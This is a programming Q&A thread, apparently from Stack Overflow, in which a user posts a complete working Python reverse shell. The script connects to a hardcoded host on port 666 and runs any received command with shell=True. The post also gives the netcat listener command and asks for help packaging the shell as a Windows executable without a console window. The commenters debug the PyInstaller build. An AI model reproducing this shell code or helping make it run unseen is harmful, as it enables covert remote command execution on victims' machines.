# Problems creating executable with PyInstaller

Tags: python, linux, python-2.7, exe, pyinstaller

I built a simple reverse_tcp in python with the following code

```
#!/usr/bin/python

import socket
import subprocess

HOST = '192.168.1.5'
PORT = 666

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

while 1:
    data = s.recv(1024)
    proc = subprocess.Popen(data, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
    stdout_value = proc.stdout.read() + proc.stderr.read()
    s.send(stdout_value)
s.close()
```

Then start a listener with netcat with the command on my Linux machine

```
nc -lp 666
```

I connect from a Windows 7 VM with no problems at all using python

```
python reverse_tcp.py
```

Then I tried both from Linux and from Windows to convert the reverse_tcp.py in a Windows executable using PyInstaller, but this doesn't work

```
pyinstaller -F -w -n reverse_tcp.exe reverse_tcp.py
```

I tried to get it working also with --noupx switch with no success.

The output from the file warnreverse_tcp.exe.txt, is the following

```
missing module named codecs.mbcs_encode - imported by codecs, encodings.mbcs
missing module named codecs.mbcs_decode - imported by codecs, encodings.mbcs
missing module named unicodedata.ucd_3_2_0 - imported by unicodedata, stringprep, encodings.idna
missing module named _sre.MAXREPEAT - imported by _sre, sre_constants
missing module named _warnings.warn_explicit - imported by _warnings, warnings
...
```

And so on and on for 165 lines.

I can't get the executable working. Any ideas?

Comment: You might need to locate the problem first, so try to pack a new exe with console (remove `-w`), then check the traceback in the console and start from there.

Comment: No traceback, no console! Windows just says it's impossible to start the app.

Comment: Do you mean 1) `pyinstaller` failed to generate exe file or 2) the exe file is generated but won't start?

Comment: PyInstaller do generate the exe, but once de executable is on Windows it doesn't start.

Comment: Then compile your script into an exe with console (remove `-w`), and then use `cmd` to start the exe, you'll be able to see the traceback.

Comment: Compiling without the -w switch on Windows, it just makes the script working.

Comment: Oh I just realized your script doesn't provide any GUI, so you might not use `-w` to compile it into a no-console-window exe...

Comment: So, if I wouldn't see that sort of black prompt any time I launch the exe?